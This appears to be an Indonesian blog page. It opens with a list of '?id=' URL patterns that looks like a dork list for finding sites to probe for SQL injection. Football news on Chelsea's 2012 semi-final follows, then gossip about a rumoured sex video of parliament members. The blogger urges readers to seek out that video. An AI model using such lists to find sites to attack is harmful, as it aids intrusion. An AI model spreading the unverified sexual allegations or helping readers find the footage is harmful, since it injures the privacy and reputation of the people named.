melbourne_details.php?id=
products.php?ID=
Stacks/storyprof.php?ID=
artists.php?id=
board/showthread.php?t=
workshopview.php?id=
workshopview.php?id=
artists/details.php?id=
displayArticle.php?id=
event.php?id=
services_details_description.php?id=
product.asp?id=
WhitsundaySailing.php?id=
nl/default.asp?id=
directory/listing_coupons.php?id=
exhibitions/details.php?id=
details.php?id=
page.php?id=
cheats/details.php?ID=
media_display.php?id=
document.php?id=
articles.php?id=
index.php?id=
video.php?id=
news-details.php?id=
details.php?id=
press2.php?ID=
products/treedirectory.asp?id=
events/details.php?id=
calendar/event.php?id=
page.php?id=
ficha.php?id=
links/browse.php?id=
wwdsemea/default.asp?ID=
forum/showthread.php?t=
media.php?id=
review.php?id=
store/item.php?id=


Semoga bermanfaat sobat..:)

Apr 24, 2012

Fernando Torres Bawa Chelsea ke Final Liga Champions

Fernando Torres
 Fernando Torres Bawa Chelsea ke Final Liga Champions . Chelsea akhirnya ke Final Liga Champions. Gol Fernando Torres di menit ke-92 membuat kedudukan imbang menjadi 2-2.

Hasil imbang itu cukup untuk Chelsea menuju Allianz Arena di Kota Munich, Jerman. Sebab di leg pertama mereka unggul 1-0.

Dalam leg kedua yang berlangsung di Stadion Camp Nou itu, Barca tampil full team. Tak mau tersisih di Liga Champions, pasukan Pep Guardiola langsung tancap gas menyerang pertahanan Chelsea.

Chelsea sempat ketinggalan 2-0 di babak pertama. Gol pertama Barca lahir dari tendangan Sergio Busquet di menit ke-35. Gol tersebut seolah memicu semangat tim Catalan tersebut.

Suasana sempat panas di menit ke-37, John Terry tertangkap wasit saat sengaja menyenggol paha Alexis Sanchez dengan lututnya. Akibatnya, hadiah kartu merah harus diterima kapten Chelsea tersebut.

Bermain dengan 10 pemain, gawang Peter Cech kembali kebobolan di menit ke-45. Kerja sama apik Lionel Messi dengan Andres Iniesta berbuah gol. 2-0 untuk Barca.

Namun, Chelsea tak patah semangat. Keasyikan menyerang, gawang Viktor Valdes terkoyak sontekan Ramires di menit ke-46. Kedudukan pun berubah 2-1 hingga jeda pertandingan.

Di babak kedua, Barca nyaris menambah gol jika tendangan penalti Lionel Messi tak membentur mistar di menit ke-49. Keberuntungan nampaknya tak hinggap bagi pasukan Catalunya, serangan mereka berkali-kali gagal menghasilkan gol.

Sebaliknya, Chelsea yang hanya bermain dengan 10 orang justru lebih beruntung. Keasyikan menyerang Barca mampu dimanfaatkan El-Nino untuk membenamkan mimpi Barca masuk ke Final. Dengan tenang, Torres membobol gawang Valdes yang sudah ditinggal pemain belakangnya.

Prestasi manajer sementara Roberto Di Matteo membawa Chelsea ke final, sama seperti yang ditorehkan Avram Grant pada 2008 lalu. Kedua pelatih sementara itu berhasil membawa Chelsea masuk ke final.

Kini, The Blues tinggal menunggu pemenang antara Real Madrid versus Bayern Munich yang akan digelar di Santiago Bernabeau, dini hari besok.

Pique Dilarikan ke Rumah Sakit


 DEFENDER Barcelona Gerard Pique dilarikan ke rumah sakit terdekat setelah berbenturan dengan rekan setimnya, kiper Victor Valdes, pada leg kedua semi-final Liga Champions kontra Chelsea di Camp Nou dini hari tadi.

Pique terkapar di lapangan, usai secara tidak sengaja menabrak Valdes yang tengah menyelamatkan peluang Didier Drogba di menit ke-17.

Pique sempat kembali ke lapangan setelah mendapat perawatan medis. Tapi merasa tidak baik dan meminta digantikan. Entrenador Pep Guardoila akhirnya memasukkan Dani Alves sembilan menit kemudian.

Pemain 25 tahun itu baru kembali dalam line-up setelah tiga pekan absen. Ia akan menjalani tes untuk mengetahui apakah mengalami problem lebih besar akibat benturan tersebut.

Terry Mengaku tak Sengaja Jatuhkan Sanchez


 JOHN Terry merasa tak sengaja menjatuhkan Alexis Sanchez. Namun akibat tindakannya itu, kapten Chelsea itu diganjar kartu merah pada leg kedua semi-final Liga Champions kontra Barcelona, dini hari tadi.

Berdasarkan lansiran Sky Sports, Terry mengklaim Sanchez telah menjaga pergerakannya. Sehingga, ia harus menumpukan berat tubuhnya dengan bagian belakang kakinya.

Anak-anak asuh Roberto Di Matteo terpaksa meladeni perlawanan Blaugrana dengan sepuluh orang. Namun, Chelsea toh berhasil merebut tiket final setelah menahan imbang tuan rumah 2-2 (agregat 3-2) berkat gol balasan Ramires dan Fernando Torres. Sebelumnya, Barca mencetak gol melalui Sergio Busquets dan Andres Iniesta.

Terry dipastikan absen dari laga puncak menghadapi Bayern Munich atau Real Madrid dan mendapat sanksi larangan tanding dalam tiga laga UEFA.

Dramatis, 10 Pemain Chelsea Singkirkan Barca

 Chelsea akhirnya memastikan melaju ke final Champions League 2011/2012 setelah sukses menahan imbang Barcelona 2-2 di leg 2 babak semifinal. Chelsea melaju setelah unggul agregat 3-2. Hebatnya, Chelsea harus bermain dengan 10 pemain sejak menit 36.

Tandang ke Camp Nou, Rabu 25 April 2012, Chelsea langsung dikurung Barcelona. Pertandingan baru berjalan 4 menit, Lionel Messi langsung mengancam gawang Chelsea. Sayang tembakan Messi masih melebar dari gawang Petr Cech.

Peluang kembali dibuat Messi di menit 19. Memanfaatkan umpan cantik Cesc Fabregas, striker lincah Argentina ini tinggal menaklukkan Cech. Sayang sepakan Messi masih menyangkut di kaki Cech.

Chelsea sempat mengejutkan lewat peluang yang didapat Drogba yang mampu melewati Gerard Pique. Sayang tembakan Drogba di menit 26 itu masih menyamping dari gawang Victor Valdes.

Namun Barca akhirnya sukses menjebol gawang Chelsea di menit 35. Busquets berhasil menjebol gawang Chelsea memanfaatkan umpan mendatar Isaac Cuenca dari sisi kanan pertahanan The Blues.

Petaka menghampiri Chelsea. Satu menit berselang dari gol Busquets, Chelsea harus bermain dengan 10 pemain setelah John Terry di kartu merah wasit setelah menendang Alexis Sanchez. Unggul jumlah pemain, pemain Barca semakin bersemangat.

Hasilnya, pada menit 43 Iniesta berhasil menggandakan keunggulan menjadi 2-0. Berawal dari sebuah bola kombinasi antara Messi dan Sanchez berhasil dikonversikan menjadi gol oleh Iniesta setelah lepas dari pengawalan Ashley Cole.

Namun di masa injury time babak pertama, Ramires mampu membuat publik Camp Nou terdiam. Berawal dari sebuah serangan balik, Ramires berhasil melewati pertahanan Barca sebelum akhirnya melepaskan bola loop guna memperdayai Valdes. Skor 2-1 untuk keunggulan Barca berakhir hingga turun minum.

Di babak kedua, Barcelona sebenarnya berpeluang menambah keunggulan lewat penalti Messi di menit 49. Sayangnya bola sepakan Messi hanya mampu membentur mistar gawang. Penalti diberikan setelah Didier Drogba melanggar Cesc Fabregas di kotak terlarang.

Barca terus mengurung pertahanan Chelsea. Namun, permainan disiplin Chelsea cukup sukses membuat frustasi pasukan Josep Guardiola. Bahkan Drogba ikut menggalang pertahanan guna menjaga gawang Petr Cech.
Pada menit 82, Sanchez sebenarnya mampu menjebol gawang Chelsea memanfaatkan umpan tarik dari Daniel Alves. Namun gol dianulir wasit setelah Daniel Alves lebih dulu terperangkap off side.
Tak kunjung menambah gol, pemain Barca mulai panik. Hasilnya di masa injury time, Fernando Torres yang menggantikan Drogba justru tak terkawal. Mendapatkan sebuah bola dari hasil serangan balik, El Nino melesat tak terkawal sebelum akhirnya sukses memperdaya Valdes.
Alhasil skor 2-2 ini bertahan hingga pertandingan usai. Chelsea kini tinggal menunggu duel Real Madrid kontra Bayern Munich untuk partai final yang akan digelar di Allianz Arena pada 19 Mei mendatang.

Susunan Pemain
Barcelona:
Victor Valdés, Javier Mascherano, Carles Puyol, Gerard Piqué (Daniel Alves, 25'), Sergio Busquets, Xavi, Andrés Iniesta, Cesc Fábregas (Seydou Keita, 74'), Lionel Messi, Isaac Cuenca (Cristian Tello, 67'), Alexis Sánchez

Chelsea: Petr Cech, John Terry, Gary Cahill (Jose Bosingwa, 12'), Ashley Cole, Branislav Ivanovic, Frank Lampard, Raul Meireles, John Mikel Obi, Ramires, Juan Mata (Salomon Kalou, 58'), Didier Drogba (Fernando Torres, 79')

Kasus Video Porno, Roy Suryo Datangi BK DPR

  
Pakar telematika yang juga anggota Komisi I DPR, Roy Suryo, akan mendatangi Badan Kehormatan DPR siang ini, Selasa 24 April 2012, terkait kasus video porno yang pasangan pelakunya mirip dengan dua orang anggota DPR.

Namun tujuan kedatangan Roy Suryo ke BK DPR justru untuk meminta BK menggunakan pakar telematika selain dirinya guna meneliti keaslian video porno tersebut. Sebelumnya, BK memang berniat memanggil ahli telematika untuk menginvestigasi video yang menghebohkan itu.

“Saya akan sampaikan ke Badan Kehormatan supaya jangan saya yang meneliti video itu. Saya akan merekomendasikan pakar telematika lain,” kata Roy Suryo di Jakarta. Menurutnya, meski dirinya merupakan pakar telematika, namun posisi dia juga sebagai anggota DPR – posisi yang sama dengan terduga pelaku dalam video porno terkait.

Oleh karena itu ia berpendapat lebih baik DPR meminta ahli telematika lain untuk meneliti keabsahan video itu agar tidak terjadi konflik kepentingan sesama anggota DPR. Roy Suryo mengaku memang sudah diminta salah seorang anggota BK untuk membantu meneliti video tersebut.

“Kemarin ada seorang anggota BK yang meminta berkonsultasi dengan saya. Jadi saya akan ke BK jam 13.00 WIB,” ucap politisi Demokrat itu. Roy Suryo sendiri belum melihat video porno tersebut. Namun ia telah melihat kolase gambar yang berasal dari potongan-potongan video tersebut.

Sebelumnya, Wakil Ketua Komisi VI dari Fraksi PDI Perjuangan Aria Bima membantah terlibat dalam kasus video porno tersebut. “Saya pastikan, saya tidak terkait. Saya masih pantau terus,” kata Aria Bima dalam pesan tertulis kepada wartawan.

Video Porno Mirip Anggota DPR Beredar

Video Porno Mirip Anggota DPR Beredar.  Berita tentang beredarnya video porno mirip anggota DPR hari ini mengemuka di media massa online. Adapun anggota DPR yang diduga terlibat dalam aksi video mesum tersebut terdiri dari 2 orang anggota DPR, pria dan wanita. Meski keberadaan video tersebut belum tentu benar anggota DPR. Namun menurut informasi yang beredar, bahwa saat ini Badan Kehormatan (BK) DPR sudah bergerak untuk menindaklanjuti informasi tersebut.

Seperti yang diungkapkan oleh Ketua BK DPR, M Prakosa kepada Detikcom, bahwa BK benar sudah mendengar ada video porno yang katanya mirip anggota DPR dari komisi IX.

Masih menurut pemberitaan Detikcom, mengutip pernyataan Prakoso, bahwa isu video itu menyambar anggota Komisi IX DPR. Siapa orangnya, Prakosa belum mau menyebut. Namun santer terdengar pemain video itu mirip seorang perempuan dari Komisi IX bersama seorang laki-laki yang merupakan koleganya, yang kabarnya juga dari DPR. Wanita dan laki-laki itu mirip anggota DPR dari PDIP. Bahkan, sang laki-laki disebut sebagai politisi yang tengah naik daun.

Menurut informasi yang beredar, video porno mirip anggota DPR sebelumnya beredar dari situs kilikitik.net, namun situs tersebut saat ini sudah tidak dapat diakses lagi. Tapi beberapa gambar cuplikan video sempat beredar diberbagai situs jejaring sosial dan juga forum internet.

foto yg berhasil di dapat dari Web ini

Sumber
Di foto-foto yang beredar, tertulis nama perempuan itu yang merupakan anggota DPR dari PDIP asal daerah pemilihan Kalimantan.

Keberadaan video itu ramai sejak, Senin (23/4). Dari cuplikan foto dari video itu terlihat perempuan dan laki-laki yang keduanya berwajah mirip anggota DPR dari PDIP itu tengah berada di sebuah kamar. Dalam foto itu, sang perempuan tanpa sehelai benang pun melakukan hubungan seksual dengan pria tersebut.

Tapi apakah benar gambar itu adalah anggota DPR, BK masih menunggu bukti-bukti. "Nanti kalau sudah ada misalnya dikirimkan melalui email atau bagaimana, BK akan meneliti. Tentu apa jelas sekali ataupun mirip kan kita harus hati-hati karena ini menyangkut martabat seseorang," tambah Prakosa yang juga politisi PDIP ini.

Video Porno Mirip Anggota DPR Hanya Rumor

Atas pemberitaan beredarnya video porno mirip anggota DPR yang diperankan oleh 2 orang, pria dan perempuan, PDIP secara tegas menolak kadernya dikaitkan dengan isu tersebut. Sekjen PDIP Tjahjo Kumolo yakin video mirip kadernya hanya rumor belaka.

"Menurut saya itu rumor, belum bisa dibuktikan siapa," kata Tjahjo seperti yang dikutip blog Karo Cyber dari situs Detikcom.

Karena masih sebatas isu, Tjahjo enggan menanggapinya. Sikap PDIP sudah jelas, isu dan rumor tak pantas ditanggapi.

Sebelumnya, BK DPR menyatakan sudah mendengar ada video itu. BK baru akan bersikap setelah mendapat bukti-bukti.

"BK sudah mendengar ada video porno yang katanya mirip anggota DPR dari Komisi IX, tapi BK belum mendapat foto atau pun video tersebut," kata Ketua BK DPR, M Prakosa.

Sampai saat ini saya beserta narasumber lainya belum mendapatkan file video itu,
setelah melakukan pencarian dan penelusuran di file sharing atau forum komunitas lainya. jika sahabat blog penasaran ingin melihat video itu, sobat harus update terus kelanjutan beritanya atau sering online dan ikut ngumpul di forum atau komunitas cyber lainya yg membahas masalah sperti ini. :D

Sumber : ( dari berbagai sumber )